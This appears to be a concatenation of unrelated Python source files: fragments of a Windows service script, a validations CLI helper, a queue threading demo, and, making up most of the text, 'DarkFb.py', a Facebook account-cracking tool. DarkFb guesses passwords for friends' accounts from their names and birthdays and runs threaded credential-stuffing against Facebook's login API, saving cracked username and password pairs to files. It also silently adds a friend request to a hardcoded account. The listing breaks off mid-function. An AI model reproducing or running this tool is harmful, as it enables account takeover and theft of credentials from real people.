# Stop the service.
win32service.ControlService(serv, win32service.SERVICE_CONTROL_STOP)
# Wait for the process to exit.
proc = AutoHANDLE(windll.kernel32.OpenProcess(SYNCHRONIZE, False, pid))
if not proc:
return
windll.kernel32.WaitForSingleObject(proc, INFINITE)
finally:
win32service.CloseServiceHandle(serv)
finally:
win32service.CloseServiceHandle(scm)
if __name__=='__main__':
if not getattr(sys, "frozen", None):
raise RuntimeError("Can only be run compiled with py2exe")
win32serviceutil.HandleCommandLine(NVDAService)
|
common.py
|
#!/usr/bin/env python
# Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
from prettytable import PrettyTable
import re
import sys
import time
import threading
import yaml
try:
from junit_xml import TestSuite, TestCase, to_xml_report_string
JUNIT_XML_FOUND = True
except ImportError:
JUNIT_XML_FOUND = False
from validations_libs import utils as v_utils
from validations_libs.cli import colors
def print_dict(data):
"""Print table from python dict with PrettyTable"""
table = PrettyTable(border=True, header=True, padding_width=1)
# Set Field name by getting the result dict keys
try:
table.field_names = data[0].keys()
table.align = 'l'
except IndexError:
raise IndexError()
for row in data:
if row.get('Status_by_Host'):
hosts = []
for host in row['Status_by_Host'].split(', '):
try:
_name, _status = host.split(',')
except ValueError:
# if ValueError, then host is in unknown state:
_name = host
_status = 'UNKNOWN'
_name = colors.color_output(_name, status=_status)
hosts.append(_name)
row['Status_by_Host'] = ', '.join(hosts)
if row.get('Status'):
status = row.get('Status')
row['Status'] = colors.color_output(status, status=status)
table.add_row(row.values())
print(table)
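
# Illustrative input shape for print_dict (hypothetical values): a list of
# result dicts sharing the same keys, where 'Status_by_Host' apparently holds
# comma-separated "host,STATUS" pairs, e.g.:
#   [{'Validations': 'check-ram', 'Status': 'PASSED',
#     'Status_by_Host': 'localhost,PASSED', 'Duration': '0:00:01.5'}]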
def write_output(output_log, results):
"""Write output log file as Json format"""
with open(output_log, 'w') as output:
output.write(json.dumps({'results': results}, indent=4,
sort_keys=True))
def write_junitxml(output_junitxml, results):
"""Write output file as JUnitXML format"""
if not JUNIT_XML_FOUND:
log = logging.getLogger(__name__ + ".write_junitxml")
log.warning('junitxml output disabled: the `junit_xml` python module '
'is missing.')
return
test_cases = []
    duration_re = re.compile(r'([0-9]+):([0-9]+):([0-9]+)\.([0-9]+)')
for vitem in results:
if vitem.get('Validations'):
parsed_duration = 0
test_duration = vitem.get('Duration', '')
matched_duration = duration_re.match(test_duration)
if matched_duration:
parsed_duration = (int(matched_duration[1])*3600
+ int(matched_duration[2])*60
+ int(matched_duration[3])
+ float('0.{}'.format(matched_duration[4])))
test_stdout = vitem.get('Status_by_Host', '')
test_case = TestCase('validations', vitem['Validations'],
parsed_duration, test_stdout)
if vitem['Status'] == 'FAILED':
test_case.add_failure_info('FAILED')
test_cases.append(test_case)
ts = TestSuite("Validations", test_cases)
with open(output_junitxml, 'w') as output:
output.write(to_xml_report_string([ts]))
def read_cli_data_file(data_file):
"""Read CLI data (YAML/JSON) file.
"""
try:
with open(data_file, 'r') as _file:
return yaml.safe_load(_file.read())
except (yaml.YAMLError, IOError) as error:
        error_msg = (
            "The file {} must be properly formatted YAML/JSON. "
            "Details: {}.").format(data_file, error)
raise RuntimeError(error_msg)
class Spinner(object):
"""Animated spinner to indicate activity during processing"""
busy = False
delay = 0.1
@staticmethod
def spinning_cursor():
while 1:
for cursor in '|/-\\':
yield cursor
def __init__(self, delay=None):
self.spinner_generator = self.spinning_cursor()
if delay and float(delay):
self.delay = delay
def spinner_task(self):
while self.busy:
sys.stdout.write(next(self.spinner_generator))
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
sys.stdout.flush()
def __enter__(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def __exit__(self, exception, value, tb):
self.busy = False
time.sleep(self.delay)
if exception is not None:
return False
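

def _demo_spinner(seconds=1.0):
    """Minimal usage sketch (not part of the original API): display the spinner
    while a blocking call runs. The function is only defined here, never called
    on import."""
    with Spinner():
        time.sleep(seconds)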
|
lifoQueues.py
|
import threading
import queue
import random
import time
def mySubscriber(queue):
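    # Drain the queue until it is empty. With a LifoQueue the most recently put
    # item comes out first (9, 8, ..., 0); task_done() marks each item processed.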
while not queue.empty():
item = queue.get()
if item is None:
break
print("{} removed {} from the queue".format(threading.current_thread(), item))
queue.task_done()
myQueue = queue.LifoQueue()
for i in range(10):
myQueue.put(i)
print("Queue Populated")
threads = []
for i in range(2):
thread = threading.Thread(target=mySubscriber, args=(myQueue,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
print("Queue is empty")
|
DarkFb.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93m©2020 \n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m Mas Fito \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/F1t0471 \x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mWA \x1b[1;91m: \x1b[1;92\x1b[92m0895802730022\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/100013193443252')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz3 = a['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz3
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
lahir = a['birthday']
pz4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
